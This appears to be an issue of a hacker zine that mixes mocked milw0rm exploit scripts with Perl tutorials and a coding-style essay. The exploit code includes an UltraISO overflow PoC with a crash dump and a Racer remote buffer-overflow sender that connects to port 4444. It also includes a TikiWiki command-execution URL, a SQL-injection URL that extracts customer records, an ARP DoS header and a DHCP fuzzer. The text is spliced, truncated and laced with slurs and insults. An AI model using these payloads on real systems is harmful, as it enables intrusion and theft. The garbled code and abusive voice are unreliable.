#Program received signal SIGSEGV, Segmentation fault.
#[Switching to thread 1696.0x6d0]
#0x41414141 in ?? ()
############################################################
#(gdb) i r
#eax 0x0 0
#ecx 0x7ce2fc 8184572
#edx 0x1 1
#ebx 0xfe6468 16671848
#esp 0x13ecf8 0x13ecf8
#ebp 0x41414141 0x41414141
#esi 0x0 0
#edi 0x13fa18 1309208
#eip 0x41414141 0x41414141
#eflags 0x10246 66118
#cs 0x1b 27
#ss 0x23 35
#ds 0x23 35
#es 0x23 35
#fs 0x3b 59
#gs 0x0 0
#fctrl 0xffff1273 -60813
#fstat 0xffff0000 -65536
#ftag 0xffffffff -1
#fiseg 0x0 0
#fioff 0x0 0
#foseg 0xffff0000 -65536
#fooff 0x0 0
#---Type <return> to continue, or q <return> to quit---
#fop 0x0 0
#(gdb)
############################################################
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "0day Ultra-Iso 8.6.2.2011 stack over flow poc \n";
print "Credits to n00b for finding the bug and writing poc\n";
print "I will be writing a local exploit for this in a few days\n";
print "Shouts: - Str0ke - Marsu - SM - Aelphaeis - vade79 - c0ntex\n";
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
my $header= "\x46\x49\x4c\x45\x20\x22";
my $endheader=
"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20".
"\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32".
"\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31".
"\x20\x30\x30\x3a\x30\x30\x3a\x30\x30";
sleep(5); # :(
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
# print <<'GAYMESSAGE'
print "Files have been created success-fully\n";
# Multiline, quotefree
print "Please note you will have to have both 1.cue and 1.bin in the same
dir\n"; # uselessness here
print "To be able to reproduce the bug open the 1.cue file with
ultra~iso\n"; # end with
print
"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
# GAYMESSAGE
# milw0rm.com [2007-05-24]
#!/usr/bin/perl
###Credit's to n00b.
################################################
#Racer v0.5.3 beta 5 (12-03-07) remote exploit.
#Racer is also prone to a buffer over flow in the
#server and client.Automatically the game open's
#Udp port 26000 and is waiting for a msg buffer.
#If we send an overly long buffer we are able to
#Control the eip register and esp hold's enough
#buffer to have a good size shell code.
###############################################
#Tested: Win Xp sp2 English
#Vendor's web site: http://www.racer.nl/
#Affected version's: all version's.
#Tested on: Racer v0.5.3 beta 5 (12-03-07).
#Special thank's to str0ke.
###########################
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
*****************************************************
Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo
Luigi Auriemma.
*****************************************************
(*)Please wait
End
use IO::Socket;
$payload2 = "B"x500;
# check it earlier
if(!$ip) # Useless
{
$protocol = 'udp'; # :(
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Make sure service
is running on the port\n";
# die "please keep your dirty ape hands off perl.
{
print $socket $payload1,$jmpcode,$shellcode,$payload2,;
print "[+]Sending malicious payload.\n";
sleep 2;
system("cls");
print "[+]Done !!.\n";
close($socket);
{
sleep 5;
print " + Connecting on port 4444 of $host ...\n";
system("telnet $ip 4444"); # OMFG!
close($socket);
}
}
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
# C:\Documents and Settings\****\Desktop\racer053b5>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# milw0rm.com [2007-08-13]
Perl also has its own ``utility belts'', namely Scalar::Util and
List::Util. These modules were added into the core around Perl version
5.8, although you can install them from the CPAN into any modern Perl
version. Let's take a look at what our Perl utility belts contain.
At first glance, this seems similar to the ref builtin function. However,
consider this:
ref []; # "ARRAY"
blessed []; # undef
Yes, for an unblessed reference, ref returns the primitive data type (such
as ARRAY or HASH), while blessed returns undef.
The dualvar function helps us create a single value that acts like the $!
built-in. $! is odd in that it has one value in a numeric context (the
error number, such as 13), and a related but different value in a string
context (the error string, such as Permission denied). We can create a
similar value using dualvar:
use Scalar::Util qw(dualvar);
my $result = dualvar(13, "Permission Denied");
if ($result == 13) { ... } # true
if ($result =~ /denied/i) { ... } # also true!
I'll save the rest of that cool module for another time.
The classic way of testing this was to use defined fileno, as in:
if (defined fileno $somereference) { ... }
I've never used the refaddr function, but it looks like a nice way to
detect whether a scalar is a reference or not, and if so, what the memory
address might be:
use Scalar::Util qw(refaddr);
refaddr "hello"; # undef
refaddr []; # some numeric value
Note that this differs from the built-in ref because ref returns the
blessed class for objects, and can be fooled to return one of the built-in
names if you're really perverse:
ref bless [], "Foo"; # "Foo"
ref bless {}, "ARRAY"; # "ARRAY" (don't do this!)
I've also never used the set_prototype function, and subroutine prototypes
are generally discouraged, but I'll mention it here anyway for
completeness:
use Scalar::Util qw(set_prototype);
my $s = sub { ... };
set_prototype $s, '$$';
# same as: $s = sub ($$) { ... };
The weaken function weakens its lvalue (scalar variable) argument so that
the reference contained within the variable is weak. A weak reference
still functions as a normal reference with respect to dereferencing, but
does not count as a reference when Perl is considering whether there are
any references to a value. Incidentally, a copy of a weak reference is not
also weak, unless you also weaken it.
Now, we can get from the root to the kids, and from the kids to the root,
using the existing references. However, the links from the kids to the
root won't count, so Perl treats the literal $root as the only path to
that hash. When $root goes out of scope, any weakened references to the
hash (as in, the values for each of the parent uplinks) are set to undef.
The refcounts of the two kids nodes are also reduced. If $leaf1 and $leaf2
are also going out of scope, then the corresponding hashes are also now
unreferenced, causing the entire data structure to disappear.
Note that weaken and isweak appear only when you install the ``XS''
version of the module.
First, let's look at (the appropriately titled) first. Let's say you have
a list of items, and you want to find the first one that is greater than
ten characters. Simply pull out first, like this:
use List::Util qw(first);
my $big_enough = first { length > 10 } @the_list;
The first routine walks through the list similar to grep or map, placing
each item into $_. The block is then evaluated, looking for a true or
false value. If true, the corresponding value of $_ is returned
immediately. If every evaluation of the block returns false, then first
returns undef.
However, the first routine avoids testing the remainder of the list once
we have found our item of choice. For short lists, we might not care, but
for long lists, this can save us some time if we expect a true value
somewhat early in the list.
We do lose a tiny bit of information with first as well. If undef is a
significant return value, we can't tell the undef as one of the list
members from the undef returned at the end of the list. For example, if we
wanted the ``first undef'' from a list:
my $first_undef = first { not defined $_ } @items;
Admittedly, I can't recall where I've ever cared that much. But it's an
interesting thing to think about when designing return values from
functions. But enough on first. Let's move on.
The next easy utility to describe from List::Util is shuffle. Yes, many
programs need a randomly ordered list of values, and here we have it as a
simple word:
use List::Util qw(shuffle);
my @deck = shuffle
map { "C$_", "D$_", "H$_", "S$_" }
0..9, qw(A K Q J);
Now our deck of cards is shuffled, and rather fairly and quickly. Like
sorting, shuffling is one of those things that looks rather easy to
implement, but turns out to have tricky parts to get right. And in the
normal List::Util installation, this is implemented at the C level (using
XS), so it's quite fast.
One of my favorite ``obscure but cool once you understand it'' functions
in list-processing languages is reduce, and although Perl doesn't have it
is as a built-in, we can at least get to it with List::Util.
Similar to sort, reduce takes a block argument that references $a and $b.
This is best illustrated by example:
use List::Util qw(reduce);
my $total = reduce { $a + $b } 1, 2, 4, 8, 16;
For the first evaluation of the block, $a and $b take on the first and
second elements of the list: 1 and 2 in this case. The block is evaluated
(returning 3), and this value is placed back into $a, and the next value
is placed in $b (4). Once again, the block is evaluated (7), and the
result placed in $a, and a new $b comes from the list. When there are no
more items in the list, the result is returned instead. The effect is if
we had written:
my $total = ((((1 + 2) + 4) + 8) + 16);
but scaled for however many elements are in the list. Nice!
By adding some smarts into the block, we can find the numeric maximum of a
list of values:
my $numeric_max = reduce { $a > $b ? $a : $b } @inputs;
This works because we select the winner of any given pair of values, and
if we keep carrying that winner forward, eventually the winningest winner
comes out the end.
For a string maximum (``z'' preferred to ``a''), just change the type of
the comparison:
my $numeric_max = reduce { $a gt $b ? $a : $b } @inputs;
And for minimums, we can change the order of the comparison, or swap the
selection of $a and $b.
For convenience, List::Util provides max, maxstr, min, minstr, and sum
directly.
I learned Smalltalk long before I learned Perl, and got quite fond of the
inject:into: method for collections. The reduce routine maps rather
nicely, if I think of Smalltalk's:
aCollection inject: firstValue into: [:a :b | "something with a and b"]
as Perl's:
reduce { "something with $a and $b" } $firstValue, @aCollection;
Note that on each iteration, $a is used, and also returned to become the
new $a or the final result. This is reminiscent of the many uses of
inject:into: in the Smalltalk images I've seen.
That wraps up List::Util, but I've still got a few inches of room here, so
let's take a quick look at the CPAN module List::MoreUtils. Although it
isn't part of the core, it's referenced in List::Util, because the module
provides a few handy shortcuts implemented (again) in C code for speed.
Like List::Util all imports must be specifically requested.
The any routine returns a boolean result if any of the items in the list
meet the given criterion, using a $_ proxy similar to grep or map:
use List::MoreUtils qw(any);
my $has_some_defined = any { defined $_ } @some_list;
Note that you could easily define any in terms of all and vice-versa, just
by negating both the condition and the result value. (These items are far
more efficient than their same-named ``equivalents'' in
Quantum::Superpositions.)
If you negate only the result values (or just the condition, depending on
how you look at it), you get two other routines defined by
List::MoreUtils, none and notall:
use List::MoreUtils qw(none notall);
my $has_no_defined = none { defined $_ } @some_list;
my $has_some_undef = notall { defined $_ } @some_list;
If you're just counting true and false values, true and false are at your
service:
use List::MoreUtils qw(true false);
my $bigger_than_10_count = true { $_ > 10 } @some_list;
my $not_bigger_than_10_count = false { $_ > 10 } @some_list;
Again, these are complementary, so use the one that reads better for your
task.
The first_index and last_index routines return where an item appears. For
example, suppose I want to know which item is the first item that is
bigger than 10:
use List::MoreUtils qw(first_index);
my $where = first_index { $_ > 10 } 1, 2, 4, 8, 16, 32;
The result here is 4, indicating that 16 is the first item greater than
10. The index value is 0-based. If the item is not found, -1 is returned,
like Perl's built-in index search for strings. last_index works like
rindex, working from the upper end of the list rather than the lower end.
The result is 4, 5, showing that elements 4 and 5 of the input list match
the condition.
The apply routine is like the built-in map, but automatically localizes
the $_ value so we can safely change it within the block:
use List::MoreUtils qw(apply);
my @no_leading_blanks = apply { s/^\s+// } @input;
then we'd see two problems. First, the result of a substitution is not the
new string, but the success value, so the outputs would simply be a series
of true and false values. Second, the $_ value is aliased to the inputs,
so @input would have been changed. Oops. The equivalent to the apply with
map would be something like:
my @output = map { local $_ = $_; [apply action here]; $_ } @input;
And yes, the many times I've written map blocks that look just like that,
I could have replaced them with apply
And List::MoreUtils contains a few more routines as well, but I've now run
out of space. I hope you find this little trip into the ``utility belts''
of Perl fun and handy. Until next time, enjoy!
#!/usr/bin/perl
#
# dhcp fuzzer, first without options
# will do options later ...
#
# update: - replaced obsolete Net::RawIP with more powerfull Net::Packet
# (a bit bitchy to install tho ...)
# - added totally unintelligent options fuzzing
#
# Pretty hackish, but it seems to work ...
# version 0.2 By Ilja van Sprundel.
#
# Todo: - give verbose output
# - run in deamon mode, find dhcp id's and remember mac addr
# - clean up the protocol implementation (I basicly copypasted what
# was in ethereal, ...)
#
# Net::Packet does a few annoying sleep()'s that I don't need
# and they get in the way of fuzzing, so just preload perl
# with the following tiny piece of code and all should be well.
#
##define LIBC "/lib/libc.so.6"
#
#int sleep(int sec) {
# void *handle;
# int r = 0;
# int (*osleep)(int);
# handle = dlopen(LIBC, 1);
# osleep = dlsym(handle, "sleep");
# if (sec != 1)
# r = osleep(sec);
# dlclose(handle);
# return(r);
#}
if ( int(rand() * 10) ) {
$hwtype = int(rand() * 10) % 6;
} else {
$hwtype = int(rand() * 1000) % 256;
}
if ( int(rand() * 10) ) {
$hops = 0;
} else {
$hops = int(rand() * 1000) % 256;
}
if ( int(rand() * 10) ) {
$seconds = int(rand() * 10) % 16;
} else {
$seconds = int(rand() * 100000) % 65536;
}
if ( int(rand() * 10) ) {
$flags = 0x0000;
} else {
$flags = int(rand() * 100000) % 65536;
}
# Don't you get annoyed at having this over and over again?
$clientip = int(rand() * 10000000000) % (0xffffffff + 1);
$yourip = int(rand() * 10000000000) % (0xffffffff + 1);
$nextip = int(rand() * 10000000000) % (0xffffffff + 1);
$relayip = int(rand() * 10000000000) % (0xffffffff + 1);
if ( int(rand() * 10) ) {
$clientaddr =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# my $clientaddr = "\x00" x 16;
} else {
read($fd, $clientaddr, 16);
}
if ( int(rand() * 10) ) {
$sname =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# my $sname = "\x00" x 64;
} else {
read($fd, $sname, 64);
}
if ( int(rand() * 10) ) {
$file =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# my $file = "\x00" x 128;
} else {
read($fd, $file, 128);
}
#
# this is the options fuzzing :) h4h4
#
# h4h4 1nd33d
#
# you gotta love Net::Packet !!!!
#
# Yup. You also gotta love how your variables suddenly become lexical...
# LOOKS LIKE SOMEONE COPIED AND PASTED
my $eth = Net::Packet::ETH->new(type => NP_ETH_TYPE_IPv4, dst =>
"FF:FF:FF:FF:FF:FF");
my $ip = Net::Packet::IPv4->new(src => '0.0.0.0', dst =>
'255.255.255.255', protocol => NP_IPv4_PROTOCOL_UDP);
my $udp = Net::Packet::UDP->new(src => 68, dst => 67);
my $content = Net::Packet::Layer7->new(data => $data);
my $frame = Net::Packet::Frame->new(l2 => $eth, l3 => $ip, l4 => $udp, l7
=> $content);
$frame->send;
# Nice spacing.
# Ilja you sure make it look like you did a lot more work than you did.
# You have the creativity of a 19th century Polish serf...motherfucker!
# Ilja, how's working at suresec? Are they paying you by the blowjob like
# Immunity?
Limbic~Region
How A Function Becomes Higher Order
All:
Higher Order Perl, by Dominus, has become a very popular book. It was
written to teach programmers how to transform programs with programs. Many
of us who do not have familiarity with Functional Programming are not
aware of what a Higher Order function is. It is a function that does at
least one of the two following things:
Accepts a function as input
Returns a function as output
For some, you can stop reading here because you already know what Higher
Order functions are - you just didn't know that's what they were called.
In Perl terminology, we often refer to them as callbacks, factories, and
functions that return code refs (usually closures). Even if you are
familiar with those terms, you may not be familiar with how to use them.
As time goes by "just this once" has happened many times and we decide to
make our version reuseable.
sub gen_max {
# Create an initial default value (or undef)
my $max = $_[0];
my $max = gen_max();
while ( <FH> ) {
chomp;
This is our first step into Higher Order functions as we have returned a
function as the output for the sake of reusability. We also have a few
advantages over the original List::Util max function.
Does not require all values to be present at once
Ability to define a starting value
Ability to process one or more values at a time
return sub {
for ( @_ ) {
This does not have to be the end of the journey into Higher Order
functions, though it is the end of the tutorial. Whenever you encounter a
situation where two programs do nearly identical things but their
differences are enough to make using a single function impossible -
consider Higher Order functions to bridge the gap. Remember - it is
important to always document your interface and assumptions well!
elsif($FORM{'file'} =~ /.(\)*./g){
Those three lines, from three different scripts, are all bad in multiple
embarassing ways.
The historians among you might note that kokanin was the very first
article in the very first Perl Underground. Here's to our man!
#!/usr/bin/perl
# kokanin@gmail dot com 20070604
# ARP dos, makes the target windows pc unusable for the duration of the
attack.
# <mode> determines if we send directly or via broadcast, bcast seems
# to be more effective (works even when printing info locally)
# Why store mac addresses for addresses outside ones subnet? Weird.
# FIXME: sometimes this crashes on the first run due to a slow arp reply
$mode = shift;
$interface = shift;
$host = shift;
Closure on Closures
by broquaint
Closure on Closures
Before we get into this tutorial we need to define what a closure is. The
Camel (3rd edition) states that a closure is
Now with that (simple?) definition out of the way, we can get on with the
show!
Right, are we all here now? Bueller ... Bueller .. Bueller? Good.
Now that we have our basic elements, let's weave them together with a
stitch of explanation and a thread of code.
Hanging around
Now as we all know, lexical variables are only active for the length of
the surrounding lexical scope, but can be kept around in an indirect
manner if something else references them e.g
__output__
__output__
$foo: [a string]
$foo: []
As we can see the answer is categorically 'No'. In retrospect this is
quite obvious as $foo has gone out of scope and there is no longer a
reference to it.
A bit of closure
However, the last example just used a simple bareblock, now let's try it
with a subroutine as the inner block
1: {
2: my $foo = "a string";
3: sub inner {
4: print "\$foo: [$foo]\n";
5: }
6: }
7: inner();
8: inner();
__output__
$foo: [a string]
$foo: [a string]
"Hold on there cowboy - $foo has already gone out of scope at the time of
the first call to inner() let alone the second, what's going on there?!?",
or so one might say. Now hold your horses, there is a very good reason for
this behaviour - the subroutine in the example is a closure. "Ok, so it's
a closure, but why?", would be a good question at this point. The reason
is that subroutines in perl have what's called a scratchpad which holds
references to any lexical variables referred to within the subroutine.
This means that you can directly access lexical variables within
subroutines even though the given variables' scope has exited.
Hmmm, that was quite a lot of raw info, so let's break it down somewhat.
Firstly subroutines can hold onto variables from higher lexical scopes.
Here's a neat little counter example (not counter-example ;)
1: {
2: my $cnt = 5;
3: sub counter {
4: return $cnt--;
5: }
6: }
7:
8: while(my $i = counter()) {
9: print "$i\n";
10: }
11: print "BOOM!\n";
__output__
5
4
3
2
1
BOOM!
While not immediately useful, the above example does demonstrate a
subroutine counter() (line 3) holding onto a variable $cnt (line 2) after
it has gone out of scope. Because of this behaviour of capturing lexical
state the counter() subroutine acts as a closure.
Now if we look at the above example a little closer we might notice that
it looks like the beginnings of a basic iterator. If we just tweak
counter() and have it return an anonymous sub we'll have ourselves a very
simple iterator
1: sub counter {
2: my $cnt = shift;
3: return sub { $cnt-- };
4: }
5:
6: my $cd = counter(5);
7: while(my $i = $cd->()) {
8: print "$i\n";
9: }
10:
11: print "BOOM!\n";
__output__
5
4
3
2
1
BOOM!
Now instead of counter() being the closure we return an anonymous
subroutine (line 3) which becomes a closure as it holds onto $cnt (line
2). Every time the newly created closure is executed the $cnt passed into
counter() is returned and decremented (this post-return modification
behaviour is due to the nature of the post-decrement operator, not the
closure).
__output__
.
..
.closuretut.html.swp
closuretut.html
example5.pl
example6.pl
example2.pl
example1.pl
example3.pl
example4.pl
example7.pl
In the code above dir_iter() (line 3) is returning an anonymous subroutine
(line 6) which is holding $dir (line 4) from a higher scope and therefore
acts as a closure. So we've created a very basic directory iterator using
a simple closure and a little bit of help from IO::Dir.
Wrapping it up
This method of creating closures using anonymous subroutines can be very
powerful[1]. With the help of Richard Clamp's marvellous File::Find::Rule
we can build ourselves a handy little grep like tool for XML files
1: use strict;
2: use warnings;
3:
4: use XML::Simple;
5: use Getopt::Std;
6: use File::Basename;
7: use File::Find::Rule;
8: use Data::Dumper;
9:
10: $::PROGRAM = basename $0;
11:
12: getopts('n:t:hr', my $opts = {});
13:
14: usage() if $opts->{h} or @ARGV == 0;
15:
16: my @dirs = $opts->{r} ? @ARGV : map dirname($_), @ARGV;
17: my @files = $opts->{r} ? '*.xml' : map basename($_), @ARGV;
18: my $callback = gensub($opts);
19:
20: my @found = find(
21: file =>
22: name => \@files,
23: ## handy callback which wraps around the callback created above
24: exec => sub { $callback->( XMLin $_[-1] ) },
25: in => [ @dirs ]
26: );
27:
28: print "$::PROGRAM: no files matched the search criteria\n" and exit(0)
29: if @found == 0;
30:
31: print "$::PROGRAM: the following files matched the search criteria\n",
32: map "\t$_\n", @found;
33:
34: exit(0);
35:
36: sub usage {
37: print "Usage: $::PROGRAM -t TEXT [-n NODE -h -r] FILES\n";
38: exit(0);
39: }
40:
41: sub gensub {
42: my $opts = shift;
43:
44: ## basic matcher wraps around the program options
45: return sub { Dumper($_[0]) =~ /\Q$opts->{t}/sm }
46: unless exists $opts->{n};
47:
48: ## node based matcher wraps around options and itself!
49: my $self; $self = sub {
50: my($tree, $seennode) = @_;
51:
52: for(keys %$tree) {
53: $seennode = 1 if $_ eq $opts->{n};
54:
55: if( ref $tree->{$_} eq 'HASH') {
56: return $self->($tree->{$_}, $seennode);
57: } elsif( ref $tree->{$_} eq 'ARRAY') {
58: return !!grep $self->($_, $seennode), @{ $tree->{$_} };
59: } else {
60: next unless $seennode;
61: return !!1
62: if $tree->{$_} =~ /\Q$opts->{t}/;
63: }
64: }
65: return;
66: };
67:
68: return $self;
69: }
Disclaimer: the above isn't thoroughly tested and isn't nearly perfect so
think twice before using in the real world
Altogether now
There ya go, closure on closures! Hopefully this tutorial has conveyed the
meaning and purpose of closures in perl and hasn't been too confounding
along the way.
[0] see. chip's Re: Toggling between two values for a more technical
definition (and discussion) of closures within perl
[1] see. tilly's Re (tilly) 9: Why are closures cool?, on the pitfalls of
nested package level subroutines vs. anonymous subroutines when dealing
with closures
#!/usr/bin/perl
# TikiWiki <= 1.9.8 Remote Command Execution Exploit
#
# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute
arbitrary commands.
# The issue is due to 'tiki-graph_formula.php' script not properly
sanitizing user input
# supplied to the f variable, which may allow a remote attacker to execute
arbitrary PHP
# commands resulting in a loss of integrity.
# -----------
# Vulnerability discovered by ShAnKaR <sec [at] shankar.antichat.ru>
#
# $Id: milw0rm_tikiwiki.pl,v 0.1 2007/10/12 13:25:08 str0ke Exp $
use strict; # Hey, you're learning! But you still forgot to enable warnings.
use LWP::UserAgent;
# Try this:
# my($target, $proxy) = @ARGV;
while()
{
print "tiki\# ";
chomp($command = <STDIN>); # You do realize that you can declare
# $command down here right?
# chomp(my $command = <STDIN>);
# Then we can lose that annoying
# decleration up at the top of the code.
exit unless $command; # Not bad.
&exploit($target, $command, $proxy);
# You really must like the &'s, eh?
}
sub usage()
{
print "[?] TikiWiki <= 1.9.8 Remote Command Execution
Exploit\n"; # ph33r
print "[?] str0ke <str0ke[!]milw0rm.com>\n";
print "[?] usage: perl $0 [target]\n";
print " [target] (ex. http://127.0.0.1/tikiwiki)\n";
print " [proxy] (ex. 0.0.0.0:8080)\n";
exit;
# You could have used a text area with a die instead of all those
# print's followed by an exit. If you're going to use print,
# at least change your quoting style.
}
sub exploit()
{
my($target, $command, $proxy) = @_; # Not bad.
my
$out=$conn->get($target."/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f
[]=x.tan.passthru($byte).die()&t=png&title=");
# Way to be consistant with your concaticnations there.
if ($out->content =~ m/start_er(.*?)end_er/ms) {
# Perl doesn't need to be told it's a match
print $1 . "\n";
} else {
print "[-] Exploit Failed\n"; # Just like this code...
exit; # Why not try die? After all, you don't want to exit
# indicating success when it didn't succeed.
}
}
# milw0rm.com [2007-10-12]
# PU5
( It is important to note that this is old, and some things about the
language have changed. Further, a handful of these points were never
the popular view in the Perl world. So keep those in mind. )
~~~~~~~~~~~~~~~~
Last week, hakkr posted some coding guidelines which I found to be too
restrictive, and not addressing enough aspects. Therefore, I've made some
guidelines as well. These are my personal guidelines, I'm not enforcing
them on anyone else.
Turning on warnings helps you finding problems in your code. But it's only
useful if you understand the messages generated. You should also know when
to disable warnings - they are warnings after all, pointing out potential
problems, but not always bugs.
NFS servers will be down, permissions will change, file will disappear,
disk will fill up, resources will be used up. System calls can fail for a
number of reasons, and failure is not uncommon. Programs should never
assume a system call will succeed - they should check for success and deal
with failures. The rare case where you don't care whether the call
succeeded should have a comment saying so.
All system calls should be checked, including, but not limited to, close,
seek, flock, fork and exec.
Signals can be sent to the program. There are default actions - but they
are not always appropriate. If not, signal handlers need to be installed.
Care should be taken since not everything is reentrant. Both pre-5.8.0 and
post-5.8.0 have their own issues.
END blocks and __DIE__ handlers should be used if the program needs to
clean up after itself, even if the program terminates unexpectedly - for
instance due to a signal, an explicite die or a fatal error.
Why break a good UNIX tradition? Different failures should have different
exit values.
~ Daemons SHOULD never write to STDOUT or STDERR but SHOULD use the syslog
service to log messages. They should use an appropriate facility and
appropriate priorities when logging messages. ~
Daemons run with no controlling terminal, and usually its standard output
and standard error disappear. The syslog service is a standard UNIX
utility especially geared towards daemons with a logging need. It allows
the system administration to determine what is logged, and where, without
the need to modify the (running) program.
--help should print a usage message and exit, while--version should the
version number of the program.
Regression tests help catch breakage of code. The regression tests should
'touch' all the code - that is, every piece of code should be executed
when running the regression suite. All border should be checked. More
tests is usually better than less test. Behaviour on invalid inputs needs
to be tested as well.
And a code source control tool will take care of keeping track of a
history or changes log, version numbers and who made the most recent
change(s).
Perl doesn't compile check the types of or even the number of arguments.
You will have to do that yourself.
This means that "normal" objects, where the attributes are stored inside
anonymous hashes or arrays should not be used. Non-OO programs benefit
from namespaces and strictness, why shouldn't objects? Use objects based
on keying scalars, like fly-weight objects, or inside-out objects. You
wouldn't use public attributes in Java all over the place either, would
you?
If you need lots of comments to explain your code, you may consider
rewriting it. Subroutines that have a whole blob of comments describing
arguments are return values are suspect. But do document invariants, pre-
and postconditions, (mathematical) relationships, theorems, observations
and other relevant things the code assumes. Variables with a broad scope
might warrant comments too.
~ POD SHOULD NOT be interleaved with the code, and is not an alternative for
comments. ~
Comments and POD have two different purposes. Comments are there for the
programmer. The person who has to maintain the code. POD is there to
create user documentation from. For the person using the code. POD should
not be interleaved with the code because this makes it harder to find the
code.
"No global variables", but better. Just disallowing global variables means
you can still have a loop variant with a file-wide scope. Limiting the
scope of variables means that loop variants are only known in the body of
the loop, temporary variables only in the current block, etc. But
sometimes it's useful for a variable to be global, or have a file-wide
scope.
~ Variables with a small scope SHOULD have short names, variables with a
broad scope SHOULD have descriptive names. ~
/, !, | and the four sets of braces are acceptable, #, @ and * are not.
Thick delimiters take too much attention. An exception is made for: q
$Revision: 1.1.1.1$, because RCS and CVS scan for the dollars.
Note that there is whitespace between ++ and -- and their operands, and
between -> and its operands.
Again, readability.
~ There SHOULD NOT be whitespace after an opening parenthesis, or before a
closing parenthesis. There SHOULD NOT be whitespace after an opening
indexing bracket or brace, or before a closing indexing bracket or
brace. ~
~ The opening brace of a block SHOULD be on the same line as the keyword and
the closing brace SHOULD align with the keyword, but short blocks are
allowed to be on one line. ~
There is just no excuse for that. More than 80 characters means it will
wrap in too many situations, leading to hard to read code.
This makes code look more pleasing, and it brings attention to the fact
similar things are happening on close by lines. Example:
my $var = 18;
my $long_var = "Some text";
This is just a first draft. I've probably forgotten some rules.
#!/usr/bin/perl
use LWP::UserAgent;
# Ahhh yes... the always needed eleet startup banner proudly proclaiming
# that this shitty code was done by a
# shitty coder for an equally shitty site/group.
sub getrecord{
while($colcount < $colnum){ # Package vars...
my $url =
"http://".$host.$path."1+AND+(select+cast(CHAR(+127+)%2b+rtrim(cast((selec
t+ISNULL(cast(".@cols[$colcount]."+as+varchar)%2c'null')+from+(select+top+
1+*++from+(select+TOP+".$count."+*+from+".$db."..customers+order+by+1+desc
+)+dtable+order+by+1+asc)+finaltable)+as+varchar))%2b+CHAR(+127+)+as+int))
+%3d+1++Or+3%3d6";
my $response = $ua->get($url);
my $content = $response->content;
# Why are things suddenly lexical?
# Cause you stole things right from the POD, you fucker
if($content =~ m/value(.*)to/) { # You don't need to tell Perl its
# got to match something genius.
open (RECORDS, '>>output.txt'); # And you claim to be a
# security guy...
print RECORDS $1;
close (RECORDS); # Nice parens there.
}
$colcount++;
}
open (RECORDS, '>>output.txt');
print RECORDS "$count\n";
close (RECORDS);
# ... *sigh*
}
args();
# Do yourself a favor and save coding Perl for those of us who know how,
# okay?
This can be blamed, in large part, on Perl not having any shocking fresh
releases recently. Au contraire, we have been waiting on Perl 6 for a
long, long time.
Perl is further hindered by its history: who wants to use the web language
of the 1990s? In the 90s, when people wanted to write truly horrible HTML
generators, they came to Perl. If this is the Perl you remember, it's time
to take a step back and realize how much more Perl was, and how much more
it is today.
I'm here to tell you the inside part of that story. Perl can more than
compete with other current languages. Further, Perl is an elite language,
above and beyond its competitors in significant ways.
Perl has been around for 20 years. 20 years of development. Ruby and PHP
are just trying to grasp unicode, for Christ's sake. That's a long way
from Perl having NATIVE unicode support since 2000. Just how much better
Perl's unicode support is (a LOT better) could fill another rant, but that
isn't the point - it is just an example of Perl's maturity.
See, maturity is an important concept. If you code Perl, you can build off
of 20 years of Perl-specific knowledge. The understanding of best practices
in Perl has evolved to an art form. Many of the very gurus who slowly
developed their knowledge over this time are still around, easily
accessible. The actual Perl interpreter is something to be admired, and has
undergone so many years of inspection (but is *still* being improved
internally, including many ways for Perl 5.10).
Perl has CPAN (or "the CPAN" to purists). CPAN is an archive of Perl
modules, and no other language has anything like it at that scale. CPAN
has over 13,000 modules. Many of these have been developed for years, and
are very stable. There are even websites out there to critique Perl modules,
and evaluate their code quality. To put this in perspective, Python has a
"package index", pypi, with over 3500 packages. However, these aren't
